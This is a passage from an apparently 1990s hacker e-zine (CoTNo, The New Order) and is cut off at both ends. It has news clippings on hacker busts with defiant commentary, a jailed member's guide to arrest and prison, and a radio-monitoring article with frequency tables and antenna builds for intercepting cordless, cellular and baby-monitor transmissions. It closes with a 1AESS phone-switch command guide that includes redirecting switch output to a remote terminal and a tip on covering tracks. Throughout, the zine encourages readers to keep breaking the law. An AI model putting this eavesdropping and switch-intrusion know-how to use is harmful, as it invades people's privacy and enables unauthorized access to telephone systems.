telephone calls around the world.
The hackers, one of whom was only 17 years old, were said to be earning
thousands of pounds a month selling cards... Police found one teenager
driving a new <20>20,000 car and with computer equipment worth <20>29,000 in his
bedroom.
AT&T officials also found a computer noticeboard called "Living Chaos"
that was being used to sell the cards for up to <20>30 each. It mentioned
Andy Gaspard, an employee of the Cleartel telephone company in
Washington, whose home was raided. "We found 61,500 stolen cards ready
to be sent to Britain," said Eric Watley, a secret service agent in the city.
(The Sunday Times, 12 February 1995)
=-=
"TNO BUST OF 1994 - NEW NEWS"
(my comments in [ ])
ROCKY MOUNTAIN NEWS
(Front Page Headline) COMPUTER-CRIME RING CRACKED (Monday June 19, 1995)
Quartet accused of hacking into Arapahoe college's system,
inciting illegal acts.
---------------------------------------------------------------------------
(Fourth Page Article) 4 ACCUSED IN COMPUTER HACKING CASE (By Marlys Duran)
Suspects used equipment at college to incite criminal acts, officials say.
Arapahoe County - Hackers calling themselves "The New Order" [Look Ma!]
allegedly gained access to the Arapahoe Community College computer and
used it to distribute tips on how to commit crimes.
One man operated a computer bulletin board on which contributors
from throughout the world exchanged how-to information on crimes ranging
from credit-card fraud to high-tech burglary, authorities said. [Of course
they fail to make that distinguishing gap that this board was NOT run off
the Arapahoe system, and that it was a private BBS run out of his house]
Computers were seized from the homes of four hackers, ranging in
age from 15 to 21. Secret Service experts were called in to help crack
the computer files. ['type filename.txt' is hard to crack eh?]
Investigators found software for breaking passwords, lists of
private passwords for several computer systems, instructions for cellular
telephone fraud, private credit reports [Plural? Nope], lists of credit-card
numbers and electronic manuals on how to make bombs and illegal drugs.
[Yes, WE did the oklahoma bombing!@$!]
In a 97-page affidavit detailing the 18-month investigation,
investigator John Davis of the Arapahoe district attorney's office said
that the hackers "operate with an attitude of indifference to the rights
and privacy of others and have made efforts to teach and involve others in
their criminal enterprise." [What the fuck does the government do everyday?]
At the home of a Denver juvenile, authorities found hazardous
chemicals and a book on how to make bombs.
Nicholas Papadenis, 21, of Broomfield, and John Patrick Jackson, 19,
of Thornton, were charged last month with committing computer crimes and
conspiracy. Both are scheduled to appear in Arapahoe County Court on July
5.
A decision is pending on whether to charge a 15-year-old Highlands
Ranch youth and a 17-year-old Denver resident, chief deputy district
attorney John Jordan said Friday.
The affidavit says Papadenis, Jackson, and the youths hacked into
the Arapahoe County Community College computer system, then used it to
illegally distribute copyrighted computer games [Sorry, TNo doesn't have
a warez division yet] and electronic magazines promoting fraud, theft,
burglary and money-laundering.
One of the magazines stated, "This publication contains information
pertaining to illegal acts. The use of this information is intended solely
for evil purposes." [Source: CoTNo 1!@#!@]
Court documents do not indicate the hackers had political motives,
and authorities declined to comment on the case. [Hackers with political
motives would be way above their head.]
A Denver University expert said computer criminals usually are not
motivated by ideology. They usually are young people who are "doing it for
the sheer challenge of it - just to demonstrate that they're able to do it,"
said Don McCubbery, director for the center on electronic commerce at DU.
McCubbery estimates that authorities learn of only 5% of computer
crimes. He said computer security experts generally have difficulty
keeping up with the hackers. [No shit]
-----------------------------------------------
(Side note box) THE NEW ORDER (Bullet listing)
Some accusations listed in court documents concerning The New Order group
of computer hackers:
- A hacker from the United Kingdom offered suspect John Jackson
a VISA card number with a $300,000 credit limit. [Tacos anyone?]
- A computer seized from a Highlands Ranch home contained password
files for computer systems at the University of Colorado
at Boulder.
- A note found in Jackson's home indicated his plans to hack into
the Thornton Police Department computer. [Yes, they believe
everything they read]
- Jackson also had a computer file containing access information
for Taco Bell and McDonald's computers. [There goes national
security!]
=-=
That is all for now. Not a good year by any means as you can tell,
especially considering who else may have been busted, that we didn't hear
about. Don't stop what you are doing though, just be more careful of
your activities. YOU are right, THEY are wrong.
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
What Happens When You Get Caught
--------------------------------
[A.K.A The Hackers Guide to the Law and Prisons]
by
D. Fanning - A.K.A. John Falcon/Renegade - TNO
Well if you are reading this, that means you are either curious or shit
happened and the law reared it's ugly head and they nabbed you. Now what
you are about to read is absolutely fucking true. Why is this? Because I
am spending the next year or so in prison for hacking. Now needless to
say, I have already announced my retirement from the scene, but I still
wanted to write and rant and rave about all the things that happen in this
world and to clue you in on a quite a few things.
Let's start with the ground rules:
1. You cannot make a deal with a cop. So when they start reading Miranda
rights, keep silent or just ask inconspicuous questions like "Where are we
going?", or the common ne, "What's going on here? Why am I being charged?"
Only a D.A. or someone in the lawyer capacity can make a deal. If a
cop offers a deal, you are still going to get charged. Cops cannot
make any exceptions on anyone. So drop all ideas of such.
2. Do not narc on anyone when the questioning starts. Your best bet would
be to just stay silent till the lawyer shows up or something. Why?
Questioning wouldn't be done unless there were gaps in their
investigation. What you want is as many of those as possible. The
more you have, the better it will be when plea bargaining starts up.
At the very least though, lets say the they do convict you, the feds
and the court find you guilty or you plea that way and you are thrown
into the clink. Guess who does your admissions paperwork? You guessed
it, the inmates. Word has a way of coming around to dealing or giving
a very wide berth to those who do the narc thing Key idea: "If you
fall, don't bring others down too. It just adds to the load on you."
3. During questioning, they will put on a lot of plays to make you talk,
they will offer you something to drink or something to make you feel
more comfortable. Well why not? Spend 60 cents and get your work done
for you by a confession. Makes things nice and neat. Don't fall for
it. If you are thirsty, accept the drink and don't tell them shit.
4. They will also do some kind of powerplay on you. They try to make you
think that they are doing you a favor, but in reality, you are digging
a deeper hole for yourself.
5. The idea of you being innocent until proven guilty has gone the way of
the do-do bird. When a jury sees you, the first thought that comes to
mind is not if you are guilty or not, the question is HOW guilty you
are. The way they see it, if you are not guilty, what are you doing
in front of them in the first place? The O.J. Simpson trial is a
perfect example. Also, look how many cop shows are around the box.
That right there is a disgrace in my book. First they have you on
film, second they pat each other on the back while you are in
misery. Sick.
Well on with the show. If they have already done an investigation on you
and you don't hear from them in a while, the first natural reaction would
be to relax and let your guard down. WRONG ANSWER! That means that some
shit is really going to go down. You should be extra careful and not
talk about it to anyone. Most likely they are looking for more evidence
to make it harder on you in the long run, like a wiretap. In the federal
system, all you need is one person's permission to record a phone call.
If you have to talk about it, use face to face contact and pat each other
down to make sure there is no bug. For instance, when I was arrested I made
a fatal mistake and talked about it to one of the co-defendants and he
had cut a deal with the D.A. already. My bacon was cooked when I heard
my voice on a tape recording.
Well no matter what happens, sooner or later you will get nabbed so I won't
get into the details of this. All I can suggest is that you really do
what ever you can to get a real attorney. P.D.'s are good for some
things but they get their paycheck from the same place that nabbed you in
the first place so don't let that fool you too much. I will admit that
it is better than nothing though.
Most likely for the computer hackers out there, they will charge you
under 18-USC-1029 which is Fraudulent or Counterfeit use of an Access
Device. This charge was mainly intended for credit cards but the D.A.'s
have taken it to just about everything that involves computers or
communications in general.
Now there are some landmark cases that have beat this into the ground.
One of them being U.S. vs Brady which was a guy making satellite decoders
with the stops pulled out of them. He beat this due to the ruling that
the signal was out there everywhere and that he merely just decoded the
signal. Therefore there was no actual loss, just potential loss which
doesn't count. Another one is U.S. vs McNutt in the 10th Circuit of
Utah. This guy made chips for cellular phones that would send different
ESN/MIN pairs to the cell site that made it always seem like a new roamer
every time he calls. The cell site just goes ahead and gives him the call
because it doesn't have time to verify if it is a valid MIN/ESN pair. He
won the case due to the same fact that there were no accountable loss
because it never used or really billed any legit customer.
The flip side of that is being two weeks ago from when this was written,
a guy was tried in LA for the exact same thing and was found guilty,
appealed the case, won the appeal, then the government re-appealed it and
he lost again. This caused a split in the court circuits which means
that this will got the Supreme Court.
Remember that the government or any government agency will not press any
issue unless there is some kind of financial deal behind it because they
are wasting time and resources on you when they can be getting Joe Blow
Cartel Drug Dealer.
So they find you guilty or you plea. The next step is the Pre-Sentence
Investigation. They basically take a fine tooth comb and find any dirt
about you that they can. You will be amazed about all the things they
can do to make you seem like a threat to society, the American way of
life, apple pie and all... All you can do is make sure or try your
hardest to make it clean as possible. Now I got ripped hard on mine due
to very strained relations with one of my parents and they managed to
throw everything that anyone had ever said about me together to make it
look like I was truly evil. That is where the cops will come back and
haunt you because everything you say will be in that report. Every
little action and all will be written with a slant of a cop. (Needless to
say who writes the report kids... The U.S. Probation Office, a branch of
the Secret Service and the F.B.I.)
Well you are convicted and here you are. Depending on where you live,
you will either be bussed/vanned to the prison where they choose for
you or they will fly you there. After you are sentenced you now belong
to the Bureau of Prisons (A D.O.J. branch). Basically you will be taken
to a county jail for holding while they classify you and then you get
transported out. When I was transported out, I was in shackles and all
taking a ride on Fed Air. The USM's have a fleet of 737's they confiscated
from drug busts and converted them into their own use. You are basically
bussed out to a unused or empty part of the airport and with a large ring of
USM's with shotguns in their hand, you get put onto an airplane and given a
box lunch and off you go. I went from Portland to Sacramento to Phoenix
in one day. Spent the night at the FCI in Phoenix then the next morning
from there to Lompoc where I am now.
Remember these words though... You are now property of the B.O.P. Basically
you are luggage, they can transport you at any time whenever they want to.
But, depending on where you go, it isn't all that bad. Most likely you will
meet friends or acquaintances that will help you along. Just ask a few
questions and usually they will know. One thing to never do is be secretive
about why you are there. You are there, most likely someone else is there
for the same thing and you can get a strong fellowship going with people
in the same predicament.
One thing to always keep in mind from now to eternity, no matter where you go.
The feds are nailing everyone for 'Conspiracy'. It's a damn shame when
you go to a place where 90 percent of the inmate population is here on some
kind of drug related charge and of that 90%, 35% are here on conspiracy
related charges. Truly something to think about.
Now for the hackers and phreakers that are facing jail. If your PSI report
even breaths any mention of some kind of use with the computer, you will be
banned from that. 3 days ago I was given a list of direct orders to avoid
all contact of that. Likewise, they put a restriction on the levels of
computer related material that I can read. Usually you can get any
periodical you want except for things that deal with gay man on man stuff.
Just like the gay people feel, that smells of discrimination but that's
just the way it is.
Phones are something else that you will wish that changes real quick. The
phones are run by a B.O.P. thing called ITS-Inmate Telephone Services.
Basically it's a Unix run PBX that limits the people you can call and it
throws the bill on you. No more collect calls or anything of that nature.
Just doesn't happen. But the inmates have won a Class action suit against
the B.O.P. about this and the government right now is appealing it.
Technically with a suit or even an appeal, you have to implement it
as soon as you can after the judgement is made. But it's been a year
since they won it and nothing changes. Basically it's the government stalling.
Well that's all for me to say this time around. Remember to keep the dream
alive and judge for yourself with that piece of gray matter between your
ears.
You can write any comments to me at:
Fanning
Reg No. 12617-006
3600 Guard Road
Lompoc, CA 93436
or e-mail at ice@alaska.net or jfalcon@ice-bbs.alaska.net
(I prefer the first method to save my friends postage costs.)
Keep it strong - TNO (The New Order)
John Falcon - Ex-TNo
1981-1994
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
--- Legal and Technical Aspects of RF Monitoring ---
--- Major [TNo] ---
SYNOPSIS
--------
The "Cordless Fun" (Noam Chomski, 2600 Magazine Summer 1994) article
doubtlessly sparked an interest in cordless phone monitoring. Wireless
telephones are a prime target for monitoring. Both cordless and cellular
telephones are nothing more than radio transceivers that, at some point,
interface with the telephone system. This article will seek to expand on
and clarify some points made in "Cordless Fun", and also to point to some
other areas of interest.
=============================================================================
CORDLESS
--------
Legal Stuff:
Monitoring cordless phones is now a federal crime! Recent legislation
prohibits listening in on cordless phones, much the same as cellular phones.
Also, the Communications Act of 1934 makes it a crime to divulge
anything you monitor to another person. It is also illegal to use anything
that you hear for personal gain. Note that this applies to anything that you
monitor, not just cordless phones. Alternatively, there are presently no
restrictions on scanners that are capable of receiving cordless phone
frequencies. However, I suspect that in the near future the feds will deny
certification to such scanners, as they did with scanners that could receive
cellular frequencies.
Technical Stuff:
Cordless telephones transmit and receive with very low power. This is
primarily to minimize interference with other nearby cordless telephones.
This makes scanning for cordless telephones a short-range endeavor. Most
cordless phones of recent manufacture operate in the 46-49MHz range.
However, the FCC has recently opened up a part of the 900MHz spectrum for
cordless telephone usage. The new 900MHz phones often offer greater range
and increased clarity. There are also models sporting "spread-spectrum"
technology, which makes monitoring with conventional scanning-receivers a
virtual impossibility. Another security measure on some cordless phones
involves encoding the DTMF tones sent from the handset to the base. This
prevents the base from accepting tones from other, unauthorized, handsets.
It does not hinder monitoring the calls, but the DTMF tones will not be
recognizable. In the 46-49MHz phones, there are ten frequency pairs
available. Many older phones only utilize one pair. Newer, more expensive,
phones can utilize all ten pairs. Some automatically search for an open
channel, while others can be manually manipulated to find a channel with less
noise. Likewise, the new 900MHz phones will scan to find a clear channel.
CELLULAR
--------
Legal Stuff:
Intercepting cellular mobile telephone (CMT) traffic is illegal. The
Electronic Communications Privacy Act of 1986 made it so. Scanners that
receive the CMT portion of the 800MHz range may no longer be manufactured,
sold, or imported into the U.S. Many scanners were designed to scan this
area, though. When the Cellular Telephone Industry Association began
complaining about this fact, most scanner manufacturers/resalers voluntarily
"blocked" the cellular freqs from their scanners. This pacified the CTIA for
a while, but the "blocks" were easily hackable. Typically, restoring a
"blocked" scanner involved removing a single diode, a ten minute job for even
the most devout technophobe. This fact led to the passage of the Telephone
Disclosure and Dispute Resolution Act (TDDRA), which denies F.C.C.
certification of scanners that receive cellular freqs, or those which may be
easily modified to do so. New scanners will be "blocked" at the CPU, and
hacking them is unlikely. Frequency converters offered another means of
monitoring cellular and other 800MHz traffic. Essentially, a converter
receives an 800MHz signal, and converts it to a 400MHz signal that the scanner
is capable of receiving. Converters are useful for scanners that have no
800MHz reception capabilities, as well as those that have portions of the
800MHz band blocked. Unfortunately, converters were also outlawed by the
TDDRA. They are still legal in kit-form, however. Another option would be
to build one from scratch, which isn't an especially difficult project.
Technical Stuff:
The word "cellular" defines the cellular phone system. A service area is
broken up into many small cells. As a user travels through an area, his call
will be handed off from one cell to the next. This handoff is transparent to
the user, but a monitor will lose the conversation. Cellular phones use low
power (a maximum of five watts) so that a cell phone will not attempt to seize
more than one site at a time. When a call is initiated by a cell phone, the
nearest site will respond, and assign an available frequency to the phone.
When the user moves comes into range of the next site, the process repeats
itself, and the new site will assign a new frequency. Therefore, it can be
difficult to track a particular conversation as it moves from site to site
with a single scanner. Every area served by cellular phones will have two
service providers. One will be the local RBOC, while the other will be a
cellular-only provider. The two systems are designated as "A" and "B"
systems, or "Wireline" and "Non-Wireline". There is no difference between
the two for monitoring purposes, but since "A" and "B" carriers use different
frequencies, it should be possible to identify local cell-towers as being "A"
or "B" sites.
PHONE PATCH
-----------
Legal Stuff:
The Communications Act of 1934 applies here as well, but there are no other
prohibitions on monitoring business-band phone patches.
Technical Stuff:
Many business radio systems have the ability to tie into the phone
system. Most of these systems will be found in 800MHz trunked
radio systems. In a conventional radio system, one frequency will
equal one channel. In a trunked system, however, frequencies and
channels are independent of each other. The trunking computer will
assign a different frequency to a radio each time it transmits,
and it will send a signal to other radios on the same channel,
telling them the current frequency in use. Phone patches are easy
to monitor, though. Since the radio on a phone patch is
transmitting constantly, the frequency used will remain the same
for the duration of the conversation. Many people mistakenly
believe these calls to be cellular, but they are not. Most phone
patches found in 800MHz trunked systems will be full-duplex, just
like cellular and home phones. Some systems, especially in UHF
(around 450MHz) and 800MHz conventional radio systems will only be
half-duplex, though. In those systems, only one person call talk
at a time, just like normal two-way radios. Radio systems are
typically designed to offer service to an entire metropolitan area,
so range is quite good. The mobile radio will transmit its signal
to a strategically located "repeater", which then re-broadcasts the
signal with much more power. So long as a scanner is within
reception range of the repeater output, monitoring will be possible
regardless of the location of the party transmitting.
EQUIPMENT
----------
Legal Stuff:
Some states prohibit mobile use of scanners. Also, it is illegal
to use a scanner in the commission of a crime.
Technical Stuff:
There is a scanner for every appetite. What sort of monitoring
one wants to do will dictate which scanner one buys. For someone
interested only in cordless phones, a ten-channel scanner with no
800MHz coverage will be quite adequate, and much cheaper than a
more capable scanner. For someone interested in cellular, a full-
coverage 800MHz scanner with a much greater frequency storage
capacity will be necessary. Base, mobile or handheld? Depends
entirely on how it will be used. Modern scanners are programmable,
while older units require crystals. For someone wanting to monitor
only a few channels (such as cordless phones, or the local police),
a crystal-controlled scanner would be adequate, and much cheaper.
But for more serious and varied scanning, programmable units are
a necessity. Models are available that store between 10 and 1000
channels. Uniden/Bearcat and Realistic are the two most commonly
available brands in the U.S. (although Realistic isn't actually a
brand, just a label...Radio Shack scanners are all manufactured by
Uniden or GRE, depending on the model). Because of the TDDRA, many
of the best scanners from the past several years are no longer
available, but watch for Hamfests (great electronic flea-
markets...inquire at your local ham radio/electronics store),
garage sales, etc. There is nothing in the TDDRA or other current
legislation that prevents private parties from owning or selling
pre-TDDRA equipment. Aside from the scanner itself, the next-most
important piece of equipment is the antenna. Handheld scanners
will generally utilize an "all-band" rubber-duck antenna (a
flexible, rubberized antenna, between 8-14" in length), while base
units will have a telescoping metal whip antenna. These antennas
are adequate for receiving strong, local signals, but more
discriminating monitors will demand more. For base units, an all
band discone type antenna, mounted outside as high as practical,
will offer good, omnidirectional performance. For those who only
want to monitor a particular band, it would be best to use an
antenna cut specifically for that band. Likewise, for those
monitoring signals coming from one general direction, a directional
antenna will offer better performance than an omnidirectional unit.
For mobile use, using an antenna mounted on the vehicle will
greatly improve reception.
MISCELLANEOUS COMMUNICATIONS
----------------------------
Voice-pagers can offer interesting monitoring. While the data-
transmissions that send the signal to the proper pager are
proprietary digital signals (and as such, illegal to monitor or
decipher), the actual "voice messages" are transmitted "in the
clear".
Packet-radio is used by ham radio operators. They have a vast
network of computer bbs's that operate independently of the phone
system. Modulated data is sent over the airwaves with a ham
transceiver, where it is received and de-modulated with a Terminal
Node Controller (TNC). Expect the use of wireless data
transmissions to increase over the next few years, and not just
among ham operators.
While not having anything to do with telephones, the "baby
monitors" people use are transmitters just like cordless phones.
They are also low-power devices, so range is limited. Most people
who use these devices would be shocked to learn that they are
"bugging" their own home.
PRESENT AND FUTURE CHALLENGES
-----------------------------
Spread spectrum, digital transmissions, encryption...these are all
factors that are affecting monitoring today. While most cellular
systems are presently analog systems, there are operational digital
systems in some areas. Scanners that are currently available won't
be able to decipher the digital communications, and it is unlikely
that digital-capable scanners will be produced. That means it will
be up to the hackers to provide the technology to intercept these
communications. Spread spectrum is quite hackable, as it was never
intended as an encryption system, per se, yet the phone
manufacturers are certainly marketing it as such. And one oft
overlooked advantage of the Clipper chip is the fact that the
backdoor can be exploited by hackers as well as the government.
In the meanwhile, there are plenty of intercepts to be had, and
there will continue to be.
=================================================================
For More Information:
=================================================================
Scanner Modification Handbook (Vols. I & II), by Bill Cheek
The scanner modification handbooks offer a plethora of information
on hacking scanners. Hacks include: increased channel capacity
(example: RS PRO-2006 from 400 channels to 6,400!), adding signal-
strength meters, cellular-freq. restoration, scanning-speed
increases, and much more.
World Scanner Report, by Bill Cheek
A monthly newsletter on the latest scanner hacks.
Available from:
COMMtronics Engineering
Box 262478
San Diego, CA 82196-2478
BBS: (619) 578-9247 (5:30PM to 1:30PM P.S.T. ONLY!)
COMMtronics Engineering also offers a scanner-computer interface
for RS PRO-43/2004/2005/2006 model scanners.
===================================================================
CRB Research Books
Box 56
Commack, MY 11725
CRB has books on scanner modifications, frequency guides, and other
interesting subjects.
=================================================================
POPULAR COMMUNICATIONS
CQ Publications
76 N. Broadway
Hicksville, NY 11801
(516) 681-2926
Pop Comm is a monthly magazine on all sorts of radio monitoring,
including scanning, shortwave, and broadcast.
==================================================================
MONITORING TIMES
Grove Enterprises, Inc.
P.O. Box 98,
300 S. Highway 64 West
Brasstown, North Carolina 28902-0098
M.T. is a monthly magazine covering all varieties of radio
communications.
==================================================================
NUTS & VOLTS
Nuts & Volts is a monthly magazine that covers a wide variety of
electronic-related subjects.
T&L Publications, Inc.
430 Princeland Court
Corona, CA 91719
(909) 371-8497
(909) 371-3052 fax
CI$ 74262,3664
1-800-783-4624 SUBSCRIPTION ORDERS ONLY
===================================================================
USENET:
alt.radio.scanner
rec.radio.scanner
===================================================================
Charts & Tables:
1. Cordless Telephone Frequencies (VHF)
2. Cordless Telephone Frequencies (900MHz)
3. Cellular Telephone Frequencies
4. Business Band Frequencies (VHF, UHF, 800MHz)
5. IMTS Frequencies
6. PAGER Frequencies
7. PACKET Frequencies
8. ROOM MONITOR Frequencies
9. homebrew cordless dipole antenna
10. homebrew 1/4 wave groundplane antenna
=================================================================
TABLE 1 - CORDLESS TELEPHONE FREQS. (CONVENTIONAL)
CH BASE HANDSET
-- ---- -------
1 46.100 49.670
2 46.630 49.845
3 46.670 49.860
4 46.710 49.770
5 46.730 49.875
6 46.770 49.830
7 46.830 49.890
8 46.870 49.930
9 46.930 49.990
10 46.970 46.970
=================================================================
TABLE 2 - 900MHz CORDLESS FREQS.
Cordless phones have been allocated the frequencies
between 902-228MHz, with channel spacing between
30-100KHz.
Following are some examples of the frequencies used by phones
currently on the market.
----------------------------------------------------------------
Panasonic KX-T9000 (60 Channels)
base 902.100 - 903.870 Base frequencies (30Khz spacing)
handset 926.100 - 927.870 Handset frequencies
CH BASE HANDSET CH BASE HANDSET CH BASE HANDSET
-- ------- ------- -- ------- ------- -- ------- -------
01 902.100 926.100 11 902.400 926.400 21 902.700 926.700
02 902.130 926.130 12 902.430 926.430 22 902.730 926.730
03 902.160 926.160 13 902.460 926.460 23 902.760 926.760
04 902.190 926.190 14 902.490 926.490 24 902.790 926.790
05 902.220 926.220 15 902.520 926.520 25 902.820 926.820
06 902.250 926.250 16 902.550 926.550 26 902.850 926.850
07 902.280 926.280 17 902.580 926.580 27 902.880 926.880
08 902.310 926.310 18 902.610 926.610 28 902.910 926.910
09 902.340 926.340 19 902.640 926.640 29 902.940 926.940
10 902.370 926.370 20 902.670 926.670 30 902.970 926.970
31 903.000 927.000 41 903.300 927.300 51 903.600 927.600
32 903.030 927.030 42 903.330 927.330 52 903.630 927.630
33 903.060 927.060 43 903.360 927.360 53 903.660 927.660
34 903.090 927.090 44 903.390 927.390 54 903.690 927.690
35 903.120 927.120 45 903.420 927.420 55 903.720 927.720
36 903.150 927.150 46 903.450 927.450 56 903.750 927.750
37 903.180 927.180 47 903.480 927.480 57 903.780 927.780
38 903.210 927.210 48 903.510 927.510 58 903.810 927.810
39 903.240 927.240 49 903.540 927.540 59 903.840 927.840
40 903.270 927.270 50 903.570 927.570 60 903.870 927.870
------------------------------------------------------------
V-TECH TROPEZ DX900 (20 CHANNELS)
905.6 - 907.5 TRANSPONDER (BASE) FREQUENCIES (100 KHZ SPACING)
925.5 - 927.4 HANDSET FREQUENCIES
CH BASE HANDSET CH BASE HANDSET CH BASE HANDSET
-- ------- ------- -- ------- ------- -- ------- -------
01 905.600 925.500 08 906.300 926.200 15 907.000 926.900
02 905.700 925.600 09 906.400 926.300 16 907.100 927.000
03 905.800 925.700 10 906.500 926.400 17 907.200 927.100
04 905.900 925.800 11 906.600 926.500 18 907.300 927.200
05 906.000 925.900 12 906.700 926.600 19 907.400 927.300
06 906.100 926.000 13 906.800 926.700 20 907.500 927.400
07 906.200 926.100 14 906.900 926.800
------------------------------------------------------------
OTHER 900 MHZ CORDLESS PHONES
AT&T #9120 - - - - - 902.0 - 905.0 & 925.0 - 928.0 MHZ
OTRON CORP. #CP-1000 902.1 - 903.9 & 926.1 - 927.9 MHZ
SAMSUNG #SP-R912- - - 903.0 & 927.0 MHZ
------------------------------------------------------------
==================================================================
TABLE 3 - CELLULAR TELEPHONE FREQUENCIES
wireline ("b" side carrier)
824.1000-834.9000
869.0100-879.9900
non-wireline ("a" side carrier)
835.0200-849.0000
880.0200-894.0000
==================================================================
TABLE 4 - BUSINESS BAND RADIO FREQS.
151.5050-151.9550MHz
154.4900-154.5400
460.6500-462.1750
462.7500-465.0000
471.8125-471.3375
474.8125-475.3375
896.0125-900.9875
935.0125-939.9875
806.0125-810.9875
811.0125-815.9875
816.0125-820.9875
851.0125-855.9875
856.0125-860.9875
861.0125-865.9875
=================================================================
TABLE 5 - MOBILE TELEPHONE FREQS. (see note1 below)
SIMPLEX OUTPUT INPUT OUTPUT INPUT
-------- -------- -------- -------- --------
035.2600 152.0300 158.4900 454.3750 459.3750
035.3000 152.0600 158.5200 454.4000 459.4000
035.3400 152.0900 158.5500 454.4250 459.4250
035.3800 152.1200 158.5800 454.4500 459.4500
035.5000 152.1500 158.6100 454.4750 459.4750
035.5400 152.1800 158.6400 454.5000 459.5000
035.6200 152.2100 158.6700 454.5250 459.5250
035.6600* 454.0250 459.0250 454.5500 459.5500
043.2200* 454.0500 459.0500 454.5750 459.5750
043.2600 454.0750 459.0750 454.6000 459.6000
043.3400 454.1000 459.1000 454.6250 459.6250
043.3800 454.1250 459.1250 454.6500 459.6500
043.4200 454.1500 459.1500
043.3000 454.1750 459.1750
043.5000 454.2000 459.2000
043.5400 454.2250 459.2250
043.5800* 454.2500 459.2500
043.6400* 454.2750 459.2750
152.2400* 454.3000 459.3000
152.8400* 454.3250 459.3250
158.1000* 454.3500 459.3500
158.7000*
*-also allocated for pager usage
(note1: These freqs are, for the most part, dead. The FCC has
reallocated most of these for other services.)
=================================================================
TABLE 6 - PAGER FREQUENCIES
035.2200 035.5800 152.4800 154.6250 158.4600
157.7400 465.0000 462.8000 462.7750 462.9250
462.7500 462.8750 462.8250 462.9000 462.8500
928.0000 929.0000 930.0000 931.0000
=================================================================
TABLE 7 - PACKET FREQUENCIES
050.6200
223.5200-223.6400
223.7100-223.8500
2303.500-2303.800
2303.900
2399.000-2399.500
=================================================================
TABLE 8 - BABY MONITOR FREQUENCIES
49.300
49.830
49.845
49.890
=================================================================
TABLE 9 - AIR PHONE FREQUENCIES
OUTPUT INPUT
454.6750 459.6750
454.9750 459.9750
849.0000 851.0000
894.0000 896.0000
==================================================================
CHART 10 - IMPROVED ANTENNA FOR CORDLESS MONITORING
The best way to improve the range for monitoring cordless
telephones is to use an antenna specifically cut for the
frequencies used in cordless phones. The following is a very
effective, yet easy to build, "homebrew" antenna.
CORDLESS DIPOLE
---------------
materials needed:
wire - virtually any type will suffice
matching transformer (RS part number 15-1296)
f connector (RS part number 278-225)
??? connector (this will connect the antenna to the scanner, so it
will be dependant upon what type of antenna jack the scanner
utilizes. Most use a BNC-type connector. Some older models
will use a Motorola-type connector.)
coax cable - while many types of coax can be used, a low-loss cable
would be best, especially if a long cable run is required.
RG-6 satellite coax (RS part number 278-1316) is a good choice.
wire transformer wire
-------------------------< >-------------------------
+ f connector
|
| coax
|
|
* connector
[ ] scanner
=================================================================
CHART 11 - 1/4 WAVE GROUND PLANE ANTENNA
Here is a simple-to-build antenna that will improve reception for
a particular frequency area.
materials needed:
wire - a rigid wire is needed here. Clothes hangers work well.
panel mount SO-239 connector (RS part number 278-201)
male PL-259 connector (RS part number 278-205)
coax cable
connector (to scanner)
|
|
|
|
[ ]
/ \
/ \
/ \
The length of the five rods will be dependant upon the frequency
you intend to monitor. Use the following formula:
WL=3X10^8/F
WL = wavelegnth (in meters)
F = frequency (in MHz)
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
-=-
-= The Tao of 1AESS =-
-=-=-=-=-=-=-=-=
-= DeadKat&Disorder =-
-=-
-= Special thanks to Gatsby and Mark Tabas =-
Introduction
-=-=-=-=-=-=
The Bell System's first trial of electronic switching took place in Morris,
Illinois, in 1960. The Morris trial culminated a 6-year development and
proved the viability of the stored-program control concept. The first
application of electronic local switching in the Bell System occurred in May
1965 with the cutover of the first 1ESS switch in Succasunna, New Jersey.
The 1ESS switching system was designed for use in areas where large numbers
of lines and lines with heavy traffic (primarily business customers) are
served. The system has generally been used in areas serving between 10,000
and 65,000 lines and has been the primary replacement system for urban
step-by-step and panel systems. The ease and flexibility of adding new
services made 1ESS switching equipment a natural replacement vehicle in
city applications where the demand for new, sophisticated business and
residence services is high.
In 1976, the first electronic toll switching system to operate a digital
time-division switching network under stored-program control, the 4ESS
system, was placed in service. It used a new control, the 1A processor,
for the first time to gain a call carrying capacity in excess of 550,000
busy-hour calls. The 1A processor was also designed for local switching
application. It doubled the call-carrying capacity of the 1ESS switching
system and was introduced in 1976 in the first 1AESS switch. The network
capacity of 1ESS switching equipment was also doubled to allow the 1AESS
switch to serve 130,000 lines.
In addition to local telephone service, the 1AESS switches offer a variety
of special services. Custom Local Area Switching Services (CLASS) are
available as well Custom Calling Services. Business customers may select
offerings such as centrex, ESS-ACS, Enhanced Private Switched Communications
Service, or electronic tandem switching.
Although more modern switches like 5ESS and DMS 200 have been developed, it
is estimated that some 50 percent of all switches are still 1AESS.
Commands
-=-=-=-=
The 1AESS uses a command line interface for all commands. The commands are
divided into three fields: action, identification, and data. The fields
are always separted by a colon. Every command is terminated by either a
period for verification commands or a 'ballbat' (!) for change commands.
The control-d is used to execute the command instead of a return. The
underscore is used as a backspace. Commands are always typed in 'all caps'.
The action field is the first field of the command and is ended by a colon.
The identification field is ended by the second colon. The identification
field has one or two subfields which are separated by a semicolon. Semicolons
are not used elsewhere in the command. The data field consists of keyword
units and is the remaining portion of the command.
Basic Machine Commands
-=-=-=-=-=-=-=-=-=-=-=
These commands provide useful information from the system. The WHO-RV-
command will tell you what CO it is and what version of the OS is installed.
If your output is scrolling off the screen press space to end scrolling.
The V-STOP- command will clear the buffer.
WHO-RV-. System information.
SPACE Stops output from scrolling.
V-STOP-. Free buffer of remaining LENS/INFO.
Channel Commands
-=-=-=-=-=-=-=-=
Channel commands are used to redirect input and output. If a switch won't
respond to a command use the OP:CHAN command to check on current channel.
If your channel is not responding, use the MON:CHAN command to switch output
and control to your terminal (the remote). You can check the status of the
RC with the RCCENSUS command.
OP:CHAN:MON! Shows all channels which are being monitored.
MON:CHAN SC1;CHAN LOC! Redirect output to remote screen.
STOP: MON;CHAN SC1;CHAN LOC! Redirect output to local screen.
(This command needs to be done after you
are finished to help cover your tracks)
OP:RCCENSUS! To see recent change status.
Tracing Commands
-=-=-=-=-=-=-=-=
CI-LIST- will give you a list of all numbers which are being traced
externally. It will not show you lines which are being traced
internally, ie: numbers inside one of the prefixes controlled
